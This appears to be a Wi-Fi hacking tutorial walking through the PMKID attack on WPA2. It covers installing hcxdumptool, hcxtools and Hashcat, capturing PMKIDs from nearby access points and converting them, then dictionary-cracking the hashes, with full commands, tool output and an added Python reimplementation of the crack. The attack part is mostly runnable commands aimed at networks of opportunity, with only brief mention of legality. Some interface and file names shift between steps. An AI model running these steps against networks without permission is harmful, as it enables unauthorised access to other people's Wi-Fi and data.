Cracking the password for a WPA2 network has worked roughly the same way for many years, but a new attack requires less interaction and less information than previous techniques and has the added benefit of working against access points with no clients connected. This new attack against the PMKID uses Hashcat to crack WPA passwords and makes it easy for hackers to find networks with weak passwords.
The Old Way to Break WPA2 Passwords
The old way of breaking WPA2 has been around for a long time and involves briefly disconnecting a connected device from the access point we want to crack. This has two disadvantages that are important for Wi-Fi hackers to understand.
The first disadvantage is the requirement that someone is connected to the network in order to attack it. The network password may be weak and very easy to break, but without a connected device to kick off the network, there is no way to capture a handshake, and so no chance of trying to crack it.
The second disadvantage of this tactic is that it is noisy and legally troubling, because it forces you to send packets that deliberately disconnect an authorized user from a service they pay to use. This kind of unauthorized interference is technically a denial-of-service attack and, if it goes on for long, amounts to jamming a network. This can lead to problems, and it can easily be detected using the tools in some of our previous guides.
A New Way to Crack the Password
Instead of relying on interrupting two-way communication between Wi-Fi devices to attempt to crack the password, an attacker can communicate directly with a vulnerable access point using the new method. On August 4, 2018, a post on the Hashcat forum detailed a new technique that targets the Robust Security Network Information Element (RSN IE) of a single EAPOL frame to capture the information needed to attempt a brute-force attack.
Like previous attacks on WPA, the attacker must be near the network they want to attack. The goal is to use a Kali-compatible wireless network adapter to capture the information needed from the network to try brute-forcing the password. Instead of using Aireplay-ng or Aircrack-ng, we use a newer wireless attack tool called hcxtools to do this.
Using Hcxtools & Hashcat
Hcxdumptool and hcxpcaptool are tools written for Wi-Fi auditing and penetration testing, and they allow us to interact with nearby Wi-Fi networks to capture WPA handshakes and PMKIDs. They work like Besside-ng in that minimal arguments are needed to launch an attack from the command line, the attack can run against either specific targets or targets of opportunity, and it can easily be run over SSH on a Raspberry Pi or another unattended device.
Once a PMKID is captured, the next step is to load the hash into Hashcat and try to crack the password. This is where hcxtools differs from Besside-ng, because a conversion step is required to prepare the file for Hashcat to use. We use hcxpcaptool to convert our PCAPNG file into a format Hashcat can work with, which leaves only the step of selecting a strong password list for your brute-force attempts.
It is worth mentioning that not every network is vulnerable to this attack. Because the PMKID is an optional field that only some manufacturers include, you should not expect universal success with this technique. Whether you can capture a PMKID depends on whether the manufacturer of the access point chose to include an element containing it, and whether you can crack a captured PMKID depends on whether the underlying password is in your brute-force password list. If either condition is not met, this attack will fail.
To try this attack, you need to be running Kali Linux and have access to a wireless network adapter that supports monitor mode and packet injection. We have several guides on how to choose a compatible wireless network adapter.
Aside from a Kali-compatible network adapter, make sure that you have fully updated and upgraded your system.
Recommended: Alfa AWUS036NHA 2.4GHz
First, we will install the tools we need. To download them, type the following in a terminal window.
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install
When this finishes installing, we will move on to installing hcxtools. To do this, open a terminal window and paste the following line by line. If you get an error, try putting sudo in front of the command.
cd ..
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
Finally, we must install Hashcat. This should be easy, as it is included in the Kali Linux repo by default. Just enter the following to install the latest version of Hashcat.
apt install hashcat
With this complete we can continue to configure the wireless network adapter.
Step 2: Prepare the Wireless Network Adapter
Once you have connected your Kali-compatible wireless network adapter, you can find its name by typing ifconfig or ip a . Typically, the name will be something like wlan0. The first step is to put the card into wireless monitor mode so we can listen to Wi-Fi traffic in the immediate vicinity.
Type this command in a terminal window, substituting the name of your wireless network adapter for wlan0.
airmon-ng start wlan0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill'
PID Name
555 NetworkManager
611 wpa_supplicant
6636 dhclient
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
Now your wireless network card should have a name like "wlan0mon" and be in monitor mode. You can confirm this by running ifconfig again.
Now we are ready to capture PMKIDs from the devices we want to attack. With our wireless network card in monitor mode (here named "wlan1mon"), we run the following command to begin the attack.
hcxdumptool -i wlan1mon -o galleria.pcapng --enable_status=1
Breaking this down, -i tells the program which interface we are using, in this case wlan1mon. The file name we save the results to can be specified with the -o flag. The channel we want to scan can be specified with the -c flag followed by the number of the channel to scan.
In the command above we use wlan1mon and save the captured PMKIDs to a file called "galleria.pcapng." While you can specify a different status value, I have not been able to capture anything with any value other than 1 .
warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956
[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5
c8b5adb615e9 -> fcc233ca8bc5
2c95694f3ca0 -> fcc233ca8bc5
2c95694f3ca0 -> b4b686abc81a
14edbb9938ea -> fcc233ca8bc5
88964e3a8ea0 -> fcc233ca8bc5
dc7fa425888a -> fcc233ca8bc5
88964e801fa0 -> fcc233ca8bc5
9822efc6fdff -> ba634d3eb80d
9822efc6fdff -> ba634d3eb80d
803773defd01 -> fcc233ca8bc5
14edbb9ba0e6 -> 803773defd01
0618d629465b -> 58fb8433aac2
e0220203294e -> fcc233ca8bc5
14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]
INFO: cha=2, rx=32752, rx(lost)=2801, tx=2205, powned=18, err=0
Once you have collected enough, you can stop the program by pressing Ctrl-C to end the attack. This should produce a PCAPNG file containing the information we need to attempt a brute-force attack, but we first have to convert it into a format that Hashcat understands.
To convert our PCAPNG file, we use hcxpcaptool with a few arguments. In the same folder where your .pcapng file is saved, run the following command in a terminal window.
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng
This command tells hcxpcaptool to use the information in the file to help Hashcat understand it, via the -E, -I, and -U flags. The -z flag sets the name of the newly converted file for Hashcat to use, and the last part of the command is the PCAPNG file we want to convert.
Running the command should produce output like the following.
summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassociation responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)
21 PMKID(s) written to galleriaHC.16800
Here we can see that we collected 21 PMKIDs in a short time. Now we can use the "galleriaHC.16800" file in Hashcat to try to crack the network passwords.
Step 5: Select a Password List and Brute Force with Hashcat
To start attacking the hashes we captured, we must choose a good password list. You can find several good password lists to get started with in the SecLists collection. Once you have a password list, place it in the same folder as the .16800 file you just converted, and then run the following command in a terminal window.
hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force topwifipass.txt
In this command, we launch Hashcat in mode 16800, which is the WPA-PMKID-PBKDF2 hash type. Then we give the name of the file we want to crack, in this case "galleriaHC.16800." The -a flag selects the kind of attack to use, in this case a "straight" dictionary attack, and the -w and --kernel-accel=1 flags set the workload profile to highest performance. If your computer suffers from performance issues, you can lower the number in the -w argument.
Finally, --force ignores some warnings so the attack can proceed, and the last part of the command specifies the password list we use to try to brute-force the PMKIDs in our file, in this case called "topwifipass.txt."
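To make clear what Hashcat mode 16800 is actually computing, here is an added example (not code from the Null Byte article, hcxtools, or Hashcat) that reproduces the check in Python: derive the PMK from a candidate passphrase with PBKDF2-HMAC-SHA1 (4096 iterations, SSID as salt), derive the PMKID as HMAC-SHA1-128 over "PMK Name", the AP MAC and the client MAC, and compare it with the PMKID in a .16800 line. The access point, MAC addresses, SSID, passphrase and wordlist are constructed for the example; the line they produce is in the same PMKID*AP_MAC*STA_MAC*SSID_hex format that hcxpcaptool writes.

```python
"""Added example: what hashcat -m 16800 does for one line of a .16800 file.
Not part of the original article, hcxtools or Hashcat; the sample network below
is constructed."""
import hashlib
import hmac

PMKID_LABEL = b"PMK Name"  # fixed label from IEEE 802.11 (12.7.1.3)


def compute_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1 over the passphrase,
    salted with the SSID, 4096 iterations, 256-bit output. This is the slow
    step that limits cracking speed."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC).
    The AP sends this in the clear in the first EAPOL frame, so no real
    client (and no deauthentication) is needed to obtain it."""
    return hmac.new(pmk, PMKID_LABEL + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def to_16800_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Hashcat 16800 format as written by hcxpcaptool -z:
    PMKID*AP_MAC*STA_MAC*SSID_hex (all fields lowercase hex)."""
    return "*".join([pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])


def parse_16800_line(line: str):
    """Split one .16800 line back into its four fields."""
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.strip().split("*")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(ssid_hex).decode())


def crack_16800_line(line: str, wordlist):
    """Straight dictionary attack (hashcat -a 0) against one captured PMKID.
    Returns the matching passphrase or None if the list is exhausted."""
    pmkid, ap_mac, sta_mac, ssid = parse_16800_line(line)
    for candidate in wordlist:
        candidate = candidate.rstrip("\n")
        # WPA2 passphrases are 8..63 characters; hashcat skips anything else
        # and reports it under "Rejected" in its status output.
        if not 8 <= len(candidate) <= 63:
            continue
        pmk = compute_pmk(candidate, ssid)
        if hmac.compare_digest(compute_pmkid(pmk, ap_mac, sta_mac), pmkid):
            return candidate
    return None


# Constructed sample network whose PSK we know, so the line we build is what
# hcxpcaptool would have written after capturing its PMKID.
SAMPLE_AP_MAC = bytes.fromhex("001122334455")   # constructed
SAMPLE_STA_MAC = bytes.fromhex("66778899aabb")  # constructed
SAMPLE_SSID = "galleria-test"                   # constructed
SAMPLE_PASSPHRASE = "password123"               # constructed weak PSK
SAMPLE_LINE = to_16800_line(
    compute_pmkid(compute_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID), SAMPLE_AP_MAC, SAMPLE_STA_MAC),
    SAMPLE_AP_MAC, SAMPLE_STA_MAC, SAMPLE_SSID)

# Constructed stand-in for topwifipass.txt; "1234567" is too short and is rejected.
SAMPLE_WORDLIST = ["1234567", "12345678", "password", "letmein1", "password123"]

if __name__ == "__main__":
    print("16800 line:", SAMPLE_LINE)
    print("cracked   :", crack_16800_line(SAMPLE_LINE, SAMPLE_WORDLIST))
```

Each candidate costs a full 4096-iteration PBKDF2, which is why the Hashcat status later in this guide reports speeds in the tens of hashes per second on a CPU; the PMKID itself is cheap to check once the PMK exists. Note also that newer Hashcat releases (6.0 and later) replaced modes 2500 and 16800 with mode 22000 and the hcxpcapngtool format, so on a current Kali install the conversion and `-m` value differ from what is shown here.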
Depending on the speed of your machine and the size of the password list, this may take quite some time to complete. To view the status at any time, press the S key for an update.
While Hashcat is running, you can check in on its progress to see whether any keys have been recovered.
When the password list is close to the end, Hashcat will automatically adjust the workload and give you a final report when it is done.
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.00%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.00%)
Candidates.#1....: 159159159 -> 00001111
HWMon.Dev.#1.....: N/A
Started: Sun Oct 28 18:05:56 2018
Stopped: Sun Oct 28 18:09:49 2018
If you managed to break any passwords, you will see them here. In our test run, none of the PMKIDs we collected had their passwords in our password list, so we could not crack any of the hashes. This is likely to be your result against any network with a strong password, but expect to see results here for networks with weak passwords.
The PMKID Hashcat Attack Makes Wi-Fi Attacks Easier
While the new attack against Wi-Fi passwords makes it easier for hackers to attempt an attack on a target, the same defenses that were effective against previous types of WPA cracking remain effective. If your network does not even support the robust security network element that contains the PMKID, this attack has no chance of success. You can audit your own network with hcxtools to see whether it is susceptible to this attack.
Even if your network is vulnerable, a strong password is still the best defense against an attacker getting onto your Wi-Fi network using this or any other password attack.
Because these attacks depend on guessing the password that the Wi-Fi network uses, there are two common sources of guesses. The first is users who choose default or terribly bad passwords, such as "12345678" or "password." These are easily broken. The second source of password guesses comes from data breaches that expose millions of real user passwords. Because many users reuse passwords across different kinds of accounts, these lists tend to be very effective when cracking Wi-Fi networks.
I hope you enjoyed this guide to the new PMKID-based Hashcat attack on WPA2 passwords! If you have any questions about this Wi-Fi password cracking tutorial or if you have a comment, please contact me on Twitter @KodyKinzie .